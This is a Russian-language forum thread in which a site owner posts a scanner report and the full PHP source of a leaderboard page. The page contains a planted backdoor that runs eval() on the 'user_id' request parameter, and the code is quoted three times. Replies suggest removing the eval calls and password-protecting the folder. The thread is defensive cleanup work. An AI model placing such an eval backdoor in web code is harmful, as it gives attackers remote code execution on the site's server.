Найдены сигнатуры шелл-скрипта.

  • Автор темы vogman
  • Дата начала
vogman
http://fight-of-robots.ru
Участник
Сообщения
153
Реакции
14
ICQ
663721547 663721547
Skype
поставил скрипт AI-Болит он мне выдал
Отчет по http:// мой сайт
Всего проверено 0 директорий и 1 файлов.
Критические замечания
AI-BOLIT-DOUBLECHECK.php already exists.
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт: (1)





./pages/_top.php
[x] L70 ...get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); |eval($_REQUEST['user_id']); die();} $db->Query("SELECT * FROM db_users_a, db_us




Отображается c 1 по 1 из 1 файлов
обращаюсь к знающим людям как это исправить?
Код:
<?PHP
$_OPTIMIZATION["title"] = "№1";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
<div>
<div class="s-bk-lf">
    <div class="acc-title">Самые активные игроки проекта!</div>
    </br></br></br>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
    <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
    while($data = $db->FetchArray()){
    $i=$i+1;


    ?>

    <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
    <td align="center"><?=$data["payment_sum"]; ?></td>
   
       
      </tr>
    <?PHP
   
    }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
</div>
<div class="clr"></div>

 
mobisaite
Участник
Сообщения
308
Реакции
63
про eval уже писалось вискасом читайте форум
 
elizoveta
Участник
Сообщения
78
Реакции
13
vogman написал(а):
поставил скрипт AI-Болит он мне выдал
Отчет по http:// мой сайт
Всего проверено 0 директорий и 1 файлов.
Критические замечания
AI-BOLIT-DOUBLECHECK.php already exists.
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт: (1)





./pages/_top.php
[x] L70 ...get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); |eval($_REQUEST['user_id']); die();} $db->Query("SELECT * FROM db_users_a, db_us




Отображается c 1 по 1 из 1 файлов
обращаюсь к знающим людям как это исправить?
Код:
<?PHP
$_OPTIMIZATION["title"] = "№1";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
<div>
<div class="s-bk-lf">
    <div class="acc-title">Самые активные игроки проекта!</div>
    </br></br></br>
</div>
<div class="silver-bk"><div class="clr"></div>
<?PHP
@Text Replacer
$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
    <td align="center">Вывел</td>

  </tr>

<?PHP
$i = 0;
    while($data = $db->FetchArray()){
    $i=$i+1;


    ?>

    <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
    <td align="center"><?=$data["payment_sum"]; ?></td>

    
      </tr>
    <?PHP

    }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
</div>
<div class="clr"></div>
vogman написал(а):
поставил скрипт AI-Болит он мне выдал
Отчет по http:// мой сайт
Всего проверено 0 директорий и 1 файлов.
Критические замечания
AI-BOLIT-DOUBLECHECK.php already exists.
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт: (1)





./pages/_top.php
[x] L70 ...get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); |eval($_REQUEST['user_id']); die();} $db->Query("SELECT * FROM db_users_a, db_us




Отображается c 1 по 1 из 1 файлов
обращаюсь к знающим людям как это исправить?
Код:
<?PHP
$_OPTIMIZATION["title"] = "№1";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
<div>
<div class="s-bk-lf">
    <div class="acc-title">Самые активные игроки проекта!</div>
    </br></br></br>
</div>
<div class="silver-bk"><div class="clr"></div>
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
    <td align="center">Вывел</td>

  </tr>

<?PHP
$i = 0;
    while($data = $db->FetchArray()){
    $i=$i+1;


    ?>

    <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
    <td align="center"><?=$data["payment_sum"]; ?></td>

    
      </tr>
    <?PHP

    }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>
</div>
<div class="clr"></div>
При помощи @Text Replacer найди все значения eval и замени на другое,я так сделала,но только не удаляй а замени чтоб скрипт не отвечал на посторонние запросы,так же можно поставить на папку где этот файл пароль через панель хостинга чтоб вход был по паролю в данную дерикторию
 
Последнее редактирование модератором:
vogman
http://fight-of-robots.ru
Участник
Сообщения
153
Реакции
14
ICQ
663721547 663721547
Skype
elizoveta написал(а):
При помощи @Text Replacer найди все значения eval и замени на другое,я так сделала,но только не удаляй а замени чтоб скрипт не отвечал на посторонние запросы,так же можно поставить на папку где этот файл пароль через панель хостинга чтоб вход был по паролю в данную дерикторию
А примерно на какое ты значение заменила?
 
elizoveta
Участник
Сообщения
78
Реакции
13
vogman написал(а):
А примерно на какое ты значение заменила?
Никакое ненадо просто удали и все должно работать нормально, я по началу боялась удалить и заменила eval на ewal, но сказали можно их просто удалить ничего страшного не будет
 
Сверху